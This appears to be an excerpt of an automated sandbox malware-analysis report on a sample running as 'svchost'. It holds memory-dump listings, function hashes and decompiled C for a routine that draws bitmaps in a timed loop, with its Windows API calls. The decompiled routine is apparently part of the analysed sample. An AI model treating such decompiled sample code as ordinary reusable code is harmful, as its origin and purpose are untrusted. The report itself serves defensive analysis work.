    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: b2965fc247305cd2ece6cae1d1fda286a7e39d6dca32de6f99f8716fad9cec42
    • Instruction ID: 602264276ce6c193c07cd1559a885979b3f0fc61da0ba959e6f72f7937ccad52
    • Opcode Fuzzy Hash: b2965fc247305cd2ece6cae1d1fda286a7e39d6dca32de6f99f8716fad9cec42
    • Instruction Fuzzy Hash: 6AD18C756082518FC319CF18E5D88E27BE1BFA8740F0E42F9C98A9B323D7359845CB99
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004642C0 Relevance: .3, Instructions: 274COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2037103b63b13f374ae70047d9bf04f5863922b68f59a88a5ea815b066336b43
    • Instruction ID: 13ea316f9a527aae2baa99fe1942b333eb2132d837011ab3f65d46d27d453c23
    • Opcode Fuzzy Hash: 2037103b63b13f374ae70047d9bf04f5863922b68f59a88a5ea815b066336b43
    • Instruction Fuzzy Hash: 0CB13675214B418FC728CF29C9909A7B7E6BF89304B18892ED9CBC7B41EA35F841CB45
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004588D0 Relevance: .3, Instructions: 274COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e54d4280d6d24488f2fe33cbcb8ed73f51912273aa230d8a818fea9767846e4a
    • Instruction ID: 5e0bac26d044b1c655d9d97a2020f1100cfede7809a0616145335ef2943ade47
    • Opcode Fuzzy Hash: e54d4280d6d24488f2fe33cbcb8ed73f51912273aa230d8a818fea9767846e4a
    • Instruction Fuzzy Hash: E0B12875214B418FD324CF29C9909A7B7E6FF89304B18892ED8CAC7B52EA35F845CB45
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00478F66 Relevance: .3, Instructions: 259COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
    • Instruction ID: 6684b9928b0fe307c68ecd6e01e57e79f1d1d1f2c7bc057325a7fa750ed7be03
    • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
    • Instruction Fuzzy Hash: 95B16A7590024A9FDB25CF04C5D0AE9BBA1FF58318F24C5AED81A5B382C735EE56CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0045E260 Relevance: .2, Instructions: 229COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: cab88bb81d6f1a3f294bb195b69a7ed404116198194961875d31482ad394f9ff
    • Instruction ID: dc08eaf4c9dd8d12cf9d7bb60e589f22d2088e1931f430fe34c9c0932c55a375
    • Opcode Fuzzy Hash: cab88bb81d6f1a3f294bb195b69a7ed404116198194961875d31482ad394f9ff
    • Instruction Fuzzy Hash: 92A1F875A087458FC318CF2AC49085AFBF2BFC8714F198A6DE99987325E770E945CB42
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00452580 Relevance: .2, Instructions: 209COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4664e54bd8655df0b62760be2564d86677a0bae60cff444b8354291ceb51d8c8
    • Instruction ID: 7d3e1dda63703d45c9bc654ed2dbd2ba781d7d0bef69021af019c93a0f46c373
    • Opcode Fuzzy Hash: 4664e54bd8655df0b62760be2564d86677a0bae60cff444b8354291ceb51d8c8
    • Instruction Fuzzy Hash: A171D43550C6868BCB15CF288484266FFD2ABAB305F0CC69FC8C89B357D666E90DC791
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00450350 Relevance: .2, Instructions: 178COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: cb3e68b2ccd2825e438886f05605c2f02178f8c24b0d15ad71760b3e7943db68
    • Instruction ID: 77a53f408c153f164d4fd17299ac71b4593e799f6ffc4d925031456c84ff7ad8
    • Opcode Fuzzy Hash: cb3e68b2ccd2825e438886f05605c2f02178f8c24b0d15ad71760b3e7943db68
    • Instruction Fuzzy Hash: 4C5115352087544FC305CE2D989016AFBD29BCA316F1C8A6EDDD9C7713E63598098B85
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00465040 Relevance: .1, Instructions: 127COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
    • Instruction ID: 09baefc498b6dd2edd2355ba8bb0320d1148eb3c0ee7ecda0380399fb878f2da
    • Opcode Fuzzy Hash: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
    • Instruction Fuzzy Hash: C2313033B4598203F71DCA2F8CA12FAEAD34FC521871DD47E99C58B356ECB984174144
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0043A9F0 Relevance: 95.0, APIs: 53, Strings: 1, Instructions: 459windowsleepCOMMON
    Download Yara Rule
    C-Code - Quality: 92%
    			E0043A9F0(void* __ecx, void* __fp0) {
				struct HDC__* _v36;
				long _v40;
				signed int _v56;
				void* _v60;
				long _v68;
				int _v88;
				int _v92;
				struct HDC__* _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				int _v112;
				struct HDC__* _v120;
				void* _v124;
				struct HDC__* _v128;
				int _v136;
				int _v140;
				void* _v144;
				void* _v148;
				struct HDC__* _v152;
				signed int _v156;
				struct HDC__* _v160;
				void* _v164;
				void* _v176;
				struct HDC__* _v180;
				void* _v208;
				void* _v212;
				struct HBITMAP__* _v228;
				struct HDC__* _v232;
				struct HBITMAP__* _v244;
				void* _v248;
				void* _v252;
				void* _v256;
				void* _v260;
				void* _v264;
				long _v268;
				long _v304;
				struct HDC__* _v384;
				struct HDC__* _v456;
				void* _v460;
				void* _v464;
				struct HDC__* _v480;
				void* __ebp;
				long _t162;
				int _t166;
				void* _t174;
				signed int _t179;
				void* _t181;
				void* _t197;
				void* _t239;
				struct HDC__* _t255;
				signed int _t264;
				int _t273;
				struct HDC__* _t325;
				struct HDC__* _t327;
				void* _t329;
				struct HDC__* _t333;
				struct HDC__* _t336;
				struct HDC__* _t340;
				void* _t363;

				_t363 = __fp0;
				_push(0xffffffff);
				_push(E004901D8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t340;
				_t329 = __ecx;
				_t325 = GetDC( *(__ecx + 0x1c));
				_v36 = _t325;
				SetStretchBltMode(_t325, E004204B0());
				_t255 = CreateCompatibleDC(_t325);
				_t333 = CreateCompatibleDC(_t325);
				 *(_t329 + 0xa4) = _t325;
				_v96 = _t333;
				_v88 = 0;
				if( *(_t329 + 0xc4) == 0) {
					L2:
					 *(_t329 + 0xc4) = 1;
					if( *(_t329 + 0xc0) == 0) {
						_t239 = CreateCompatibleBitmap(_t325,  *(_t329 + 0xd4),  *(_t329 + 0xd8));
						 *(_t329 + 0xc0) = _t239;
						_v104 = SelectObject(_t333, _t239);
						_push( *((intOrPtr*)(_t329 + 0xdc)));
						E00489F7B( &_v56);
						asm("sbb eax, eax");
						_v100 = SelectObject(_v120,  ~( &_v60) & _v56);
						PatBlt(_v128, 0, 0,  *(_t329 + 0xd4),  *(_t329 + 0xd8), 0xf00021);
						SelectObject(_v152, _v124);
						SelectObject(_v160, _v148);
						_v108 = 0x497844;
						_t28 =  &_v108; // 0x497844
						_v92 = 0;
						E00489F15(_t28);
						_v92 = 0xffffffff;
					}
					 *(_t329 + 0xc4) = 0;
					 *(_t329 + 0x84) = 4;
					if( *((intOrPtr*)(_t329 + 0xbc)) == 1) {
						L34:
						DeleteDC(_t255);
						DeleteDC(_v100);
						ReleaseDC( *(_t329 + 0x1c), _t325);
						 *((intOrPtr*)(_t329 + 0xbc)) = 2;
						 *[fs:0x0] = _v36;
						return 1;
					} else {
						do {
							_t162 = GetTickCount();
							_v40 = _t162;
							_v68 = _t162;
							if( *(_t329 + 0xc4) == 0) {
								L8:
								 *(_t329 + 0xc4) = 1;
								_v92 = SelectObject(_v96,  *(_t329 + 0xc0));
								_t166 =  *(_t329 + 0x84);
								if(_t166 == 8 || _t166 == 0xc) {
									_v108 = SelectObject(_t255, _v96);
									BitBlt(_v112,  *(_t329 + 0x60),  *(_t329 + 0x5c),  *(_t329 + 0x54),  *(_t329 + 0x58), _t255, 0, 0, 0xcc0020);
									SelectObject(_t255, _v144);
									DeleteObject(_v148);
									_v152 = 0;
								}
								 *(_t329 + 0x84) = 0;
								_t174 = E0043B1D0();
								_v144 = _t174;
								if(_t174 != 0) {
									_t273 =  *(_t329 + 0x84);
									if(_t273 == 8 || _t273 == 0xc) {
										_t197 = CreateCompatibleBitmap(_t325,  *(_t329 + 0x54),  *(_t329 + 0x58));
										_v164 = _t197;
										_v176 = SelectObject(_t255, _t197);
										BitBlt(_t255, 0, 0,  *(_t329 + 0x54),  *(_t329 + 0x58), _v180,  *(_t329 + 0x60),  *(_t329 + 0x5c), 0xcc0020);
										SelectObject(_t255, _v212);
										_t174 = _v208;
									}
									_v228 = SelectObject(_t255, _t174);
									if( *((intOrPtr*)(_t329 + 0x88)) == 0) {
										BitBlt(_v232,  *(_t329 + 0x60),  *(_t329 + 0x5c),  *(_t329 + 0x54),  *(_t329 + 0x58), _t255, 0, 0, 0xcc0020);
									} else {
										_t336 = CreateCompatibleDC(_t325);
										_t327 = CreateCompatibleDC(_t325);
										_v228 = CreateBitmap( *(_t329 + 0x54),  *(_t329 + 0x58), 1, 1, 0);
										_v244 = CreateBitmap( *(_t329 + 0x54),  *(_t329 + 0x58), 1, 1, 0);
										_v256 = SelectObject(_t336, _v248);
										_v256 = SelectObject(_t327, _v252);
										_v268 = SetBkColor(_t255,  *(_t329 + 0xa0));
										BitBlt(_t327, 0, 0,  *(_t329 + 0x54),  *(_t329 + 0x58), _t255, 0, 0, 0xcc0020);
										SetBkColor(_t255, _v304);
										BitBlt(_t336, 0, 0,  *(_t329 + 0x54),  *(_t329 + 0x58), _t327, 0, 0, 0x330008);
										BitBlt(_v384,  *(_t329 + 0x60),  *(_t329 + 0x5c),  *(_t329 + 0x54),  *(_t329 + 0x58), _t327, 0, 0, 0x8800c6);
										BitBlt(_t255, 0, 0,  *(_t329 + 0x54),  *(_t329 + 0x58), _t336, 0, 0, 0x8800c6);
										BitBlt(_v456,  *(_t329 + 0x60),  *(_t329 + 0x5c),  *(_t329 + 0x54),  *(_t329 + 0x58), _t255, 0, 0, 0xee0086);
										DeleteObject(SelectObject(_t336, _v460));
										DeleteObject(SelectObject(_t327, _v464));
										DeleteDC(_t336);
										DeleteDC(_t327);
										_t325 = _v480;
									}
									SelectObject(_t255, _v264);
									DeleteObject(_v260);
								}
								if(IsWindow( *(_t329 + 0x1c)) != 0) {
									E0043A530(_t329, _t363,  &_v136,  &_v140,  &_v108,  &_v112);
									_push(0xcc0020);
									if( *((intOrPtr*)(_t329 + 0xd0)) == 0) {
										BitBlt(_t325, _v136, _v140,  *(_t329 + 0xd4),  *(_t329 + 0xd8), _v160, 0, 0, ??);
									} else {
										StretchBlt(_t325, _v136, _v140, _v108, _v112, _v160, 0, 0,  *(_t329 + 0xd4),  *(_t329 + 0xd8), ??);
									}
								}
								SelectObject(_v160, _v148);
								 *(_t329 + 0xc4) = 0;
								_t179 =  *(_t329 + 0x90);
								if(_t179 == 0) {
									_t264 =  *(_t329 + 0x9c);
									_v156 = _t264;
								} else {
									_t264 = _t179 + _t179 * 4 << 1;
									_v156 = _t264;
								}
								if( *((intOrPtr*)(_t329 + 0xbc)) == 1) {
									break;
								} else {
									while(_t264 > _v140 - _v112) {
										Sleep(0xa);
										_v140 = GetTickCount();
										if( *((intOrPtr*)(_t329 + 0xbc)) != 1) {
											_t264 = _v156;
											continue;
										}
										goto L31;
									}
									goto L31;
								}
							} else {
								goto L7;
							}
							do {
								L7:
							} while ( *(_t329 + 0xc4) != 0);
							goto L8;
							L31:
						} while ( *((intOrPtr*)(_t329 + 0xbc)) != 1);
						_t181 = _v160;
						if(_t181 != 0) {
							DeleteObject(_t181);
						}
						goto L34;
					}
				} else {
					goto L1;
				}
				do {
					L1:
				} while ( *(_t329 + 0xc4) != 0);
				goto L2;
			}































































    0x0043a9f0
    0x0043a9f0
    0x0043a9f2
    0x0043a9fd
    0x0043a9fe
    0x0043aa0b
    0x0043aa18
    0x0043aa1a
    0x0043aa25
    0x0043aa35
    0x0043aa39
    0x0043aa3b
    0x0043aa41
    0x0043aa45
    0x0043aa55
    0x0043aa61
    0x0043aa61
    0x0043aa73
    0x0043aa88
    0x0043aa96
    0x0043aa9e
    0x0043aaa8
    0x0043aaad
    0x0043aac0
    0x0043aad2
    0x0043aae8
    0x0043aaf8
    0x0043ab04
    0x0043ab06
    0x0043ab0e
    0x0043ab12
    0x0043ab1a
    0x0043ab1f
    0x0043ab1f
    0x0043ab2f
    0x0043ab39
    0x0043ab4c
    0x0043af39
    0x0043af40
    0x0043af47
    0x0043af4e
    0x0043af54
    0x0043af6b
    0x0043af75
    0x0043ab52
    0x0043ab52
    0x0043ab52
    0x0043ab58
    0x0043ab5c
    0x0043ab68
    0x0043ab74
    0x0043ab74
    0x0043ab8c
    0x0043ab90
    0x0043ab99
    0x0043abb3
    0x0043abcb
    0x0043abd7
    0x0043abde
    0x0043abe4
    0x0043abe4
    0x0043abee
    0x0043abf8
    0x0043abff
    0x0043ac03
    0x0043ac09
    0x0043ac12
    0x0043ac22
    0x0043ac2a
    0x0043ac37
    0x0043ac53
    0x0043ac5f
    0x0043ac61
    0x0043ac61
    0x0043ac69
    0x0043ac75
    0x0043adf9
    0x0043ac7b
    0x0043ac83
    0x0043ac8e
    0x0043aca6
    0x0043acbd
    0x0043accd
    0x0043acd9
    0x0043ad02
    0x0043ad06
    0x0043ad12
    0x0043ad2f
    0x0043ad54
    0x0043ad71
    0x0043ad96
    0x0043ada9
    0x0043adbc
    0x0043adc9
    0x0043adcc
    0x0043adce
    0x0043add2
    0x0043ae05
    0x0043ae0c
    0x0043ae0c
    0x0043ae1e
    0x0043ae3a
    0x0043ae45
    0x0043ae4c
    0x0043aea4
    0x0043ae4e
    0x0043ae7a
    0x0043ae7a
    0x0043ae4c
    0x0043aeb4
    0x0043aeb6
    0x0043aec0
    0x0043aec8
    0x0043aed5
    0x0043aedb
    0x0043aeca
    0x0043aecd
    0x0043aecf
    0x0043aecf
    0x0043aee8
    0x00000000
    0x0043aeea
    0x0043aef0
    0x0043af00
    0x0043af0c
    0x0043af19
    0x0043aeec
    0x00000000
    0x0043aeec
    0x00000000
    0x0043af19
    0x00000000
    0x0043aef0
    0x00000000
    0x00000000
    0x00000000
    0x0043ab6a
    0x0043ab6a
    0x0043ab70
    0x00000000
    0x0043af1b
    0x0043af21
    0x0043af2a
    0x0043af30
    0x0043af33
    0x0043af33
    0x00000000
    0x0043af30
    0x00000000
    0x00000000
    0x00000000
    0x0043aa57
    0x0043aa57
    0x0043aa5d
    0x00000000

    APIs
    • GetDC.USER32(?), ref: 0043AA12
      • Part of subcall function 004204B0: EnumDisplaySettingsA.USER32(00000000,000000FF,?), ref: 004204BF
    • SetStretchBltMode.GDI32(00000000,00000000), ref: 0043AA25
    • CreateCompatibleDC.GDI32(00000000), ref: 0043AA32
    • CreateCompatibleDC.GDI32(00000000), ref: 0043AA37
    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043AA88
    • SelectObject.GDI32(00000000,00000000), ref: 0043AA9C
    • SelectObject.GDI32(?,?), ref: 0043AAC6
    • PatBlt.GDI32(?,00000000,00000000,?,?,00F00021), ref: 0043AAE8
    • SelectObject.GDI32(?,?), ref: 0043AAF8
    • SelectObject.GDI32(?,?), ref: 0043AB04
    • GetTickCount.KERNEL32 ref: 0043AB52
    • SelectObject.GDI32(?,?), ref: 0043AB8A
    • SelectObject.GDI32(00000000,00000000), ref: 0043ABA6
    • BitBlt.GDI32(?,?,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 0043ABCB
    • SelectObject.GDI32(00000000,?), ref: 0043ABD7
    • DeleteObject.GDI32(00000000), ref: 0043ABDE
    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043AC22
    • SelectObject.GDI32(00000000,00000000), ref: 0043AC2E
    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,00000000,00CC0020), ref: 0043AC53
    • SelectObject.GDI32(00000000,?), ref: 0043AC5F
    • SelectObject.GDI32(00000000,?), ref: 0043AC67
    • CreateCompatibleDC.GDI32(00000000), ref: 0043AC7C
    • CreateCompatibleDC.GDI32(00000000), ref: 0043AC85
    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0043AC9B
    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0043ACB3
    • SelectObject.GDI32(00000000,?), ref: 0043ACC3
    • SelectObject.GDI32(00000000,?), ref: 0043ACD3
    • SetBkColor.GDI32(00000000,?), ref: 0043ACE5
    • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 0043AD06
    • SetBkColor.GDI32(00000000,?), ref: 0043AD12
    • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00330008), ref: 0043AD2F
    • BitBlt.GDI32(?,?,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 0043AD54
    • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 0043AD71
    • BitBlt.GDI32(?,?,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 0043AD96
    • SelectObject.GDI32(00000000,?), ref: 0043ADA2
    • DeleteObject.GDI32(00000000), ref: 0043ADA9
    • SelectObject.GDI32(00000000,?), ref: 0043ADB5
    • DeleteObject.GDI32(00000000), ref: 0043ADBC
    • DeleteDC.GDI32(00000000), ref: 0043ADC9
    • DeleteDC.GDI32(00000000), ref: 0043ADCC
    • SelectObject.GDI32(00000000,?), ref: 0043AE05
    • DeleteObject.GDI32(?), ref: 0043AE0C
    • IsWindow.USER32(?), ref: 0043AE16
    • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0043AE7A
    • BitBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00CC0020), ref: 0043AEA4
    • SelectObject.GDI32(?,?), ref: 0043AEB4
    • Sleep.KERNEL32(0000000A), ref: 0043AF00
    • GetTickCount.KERNEL32 ref: 0043AF06
    • DeleteObject.GDI32(00000000), ref: 0043AF33
    • DeleteDC.GDI32(00000000), ref: 0043AF40
    • DeleteDC.GDI32(?), ref: 0043AF47
    • ReleaseDC.USER32(?,00000000), ref: 0043AF4E
      • Part of subcall function 0043A530: GetClientRect.USER32(?,?), ref: 0043A557
      • Part of subcall function 0043A530: __ftol.LIBCMT ref: 0043A62E
      • Part of subcall function 0043A530: __ftol.LIBCMT ref: 0043A641
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
